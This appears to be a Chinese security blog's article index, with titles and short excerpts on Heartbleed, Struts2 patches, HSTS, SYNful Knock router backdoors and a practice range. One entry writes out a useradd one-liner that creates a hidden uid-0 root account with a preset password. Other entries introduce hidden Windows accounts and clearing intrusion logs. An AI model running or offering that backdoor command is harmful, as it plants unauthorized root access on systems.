原创 自學成才的黑客(安全研究員)是從哪學到那些知識的?

http://www.zhihu.com/question/23073812/answer/23563575?utm_source=weibo&ut

原创 一句話添加root賬戶

useradd -p 0`openssl passwd -1 -salt 'abc' cqrdpass` -u 0  -o -g root -G root -s /bin/bash -d /usr/bin/cqrd cqrd user

原创 CSRFGuard 3 Token Injection

Overview OWASP CSRFGuard implements a variant of the synchronizer token pattern to mitigate the risk of CSRF attacks.

原创 多瀏覽器兼容性測試整體解決方案

https://github.com/alibaba/f2etest

原创 我是如何從3億IP中找到CISCO後門路由器的

接到某單位通知讓查找中國具有SYNful Knock後門的CISCO路由器,按照曼迪安特分析的報告稱中國已經發現3臺具有SYNful Knock後門的路由器,如何快速從全國3億IP地址中快速查找出3個IP地址難度還是十分的大啊,而我經過

原创 自動識別編碼讀取和寫入文件

public class FileTraning {/*** 判斷文件的編碼格式* @param fileName :file* @return 文

原创 Struts2 驗證碼圖片生成實例

Step 1.隨機驗證碼 一步一步來,要生成驗證碼圖片,首先要有驗證碼,然後才能在畫在圖片上。爲了能夠靈活控制驗證碼,特別編寫了SecurityCode類,它向外提供隨機字符串。並且可以控制字符串的長度和難度。SecurityCode

原创 APT組織PawnStorm 0Day如何繞過Java點擊播放保護

幾個月以前,趨勢科技發現了APT組織Pawn Storm利用之前未經披露的Java漏洞(CVE-2015-2590)進行攻擊。在那之後,我們注意到一個被用於染過Java點擊播放(click-to-play)保護的獨立漏洞。 第二個

原创 windows2003下創建永遠的隱藏帳戶

防止黑客侵入你正在使用的Windows系統 當黑客入侵一臺主機後,會想方設法保護自己的“勞動成果”,因此會在肉雞上留下種種後門來長時間得控制肉雞,其中使用最多的就是賬戶隱藏技術。在肉雞上建立一個隱藏的賬戶,以備需要的時候使用。賬戶隱藏

原创 struts2 漏洞 S2-016、S2-017修補方案

官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S2-016 S2-017:https://cwiki.apache.org/confluence/display

原创 如何配置使用 HTTP 嚴格傳輸安全(HSTS)

HTTP 嚴格傳輸安全(HSTS)是一種安全功能,web 服務器通過它來告訴瀏覽器僅用 HTTPS 來與之通訊,而不是使用 HTTP。本文會說明如何在 Apache2、Nginx 和 Lighttpd 上如何啓用 HSTS。在主流的 w

原创 XVWA黑客靶場發佈

簡介 Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL編寫的靶場,可以幫助初學者快速學習安全姿勢。 我們建議將這個靶場部署在本地服務器來提升你的能力。當然了學習並掌握這些姿勢後

原创 安全盒子裝B公開課: 裝B架構師-K0r4dji

面試官:滲透測試入手 知識點: 一、常見數據庫 Oracle、DB2、SqlServer、MySql、Access ..等 二、前端基礎 JavaS

原创 Heartbleed 實戰:一個影響無數網站的緩衝區溢出漏洞

作者: 李博傑昨天 OpenSSL 爆出了名爲 Heartbleed 的重大安全漏洞(CVE-2014-0160),通過 TLS 的 heartbeat 擴展,可以讀取運行 HTTPS 服務的服務器上長達 64 KB 的內存,獲取內存中可

原创 如何清除windows入侵的記錄

安全日誌   系統日誌   DNS日誌默認位置:%systemroot%system32config,默認文件大小512KB,管理員都會改變這個默認大小。安全日誌文件:%systemroot%system32configSecEvent